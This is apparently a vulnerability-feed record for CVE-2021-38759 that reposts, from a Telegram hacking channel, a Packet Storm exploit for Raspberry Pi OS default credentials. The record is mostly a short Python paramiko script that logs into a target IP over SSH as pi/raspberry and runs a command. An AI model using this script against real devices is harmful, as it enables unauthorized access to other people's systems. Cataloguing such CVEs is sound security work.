{"uuid": "95072351-af0e-4ee0-84d6-4feb6d615624", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-38759", "type": "seen", "source": "https://t.me/hacking_Attack/34313", "content": "Exploit Collector\nRaspberry Pi 5.10 Default Credentials\n\nhttps://4.bp.blogspot.com/-Lnl-ZxRP9Iw/WWlvEVwqA2I/AAAAAAAAIK8/WG2BCM3S_lsUOouuCwhP5sp3j7hYzeO-wCLcBGAs/s1600/h133.png \nRaspberry Pi version 5.10 has default credentials of pi/raspberry. This has been a known standard of theirs for a long time but it has been formally given a CVE.\n\nMD5 | d93ec1f954595b314818e65b203e583c\n\nDownload\n# Exploit Title: Raspberry Pi 5.10 - Default Credentials\n# Date: 08/12/2021\n# Exploit Author: netspooky\n# Vendor Homepage: https://www.raspberrypi.com/\n# Software Link: https://www.raspberrypi.com/software/operating-systems/\n# Version: Raspberry Pi OS &lt;=\n# Tested on: Raspberry Pi OS 5.10\n# CVE : CVE-2021-38759\n\n# Initial Release: https://twitter.com/netspooky/status/1468603668266209280\n\n# Run: $ python3 exploit.py IP\n\nimport paramiko\n\nimport sys\n\nh=sys.argv[1]\n\nu=\"pi\"\n\np=\"raspberry\"\n\nc=paramiko.client.SSHClient()\n\nc.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\nc.connect(h,username=u,password=p)\n\ni,o,e=c.exec_command(\"id\")\n\nprint(o.read())\n\nc.close()\n\n\nSource:packetstormsecurity.com", "creation_timestamp": "2026-09-01T20:02:04.948969Z"}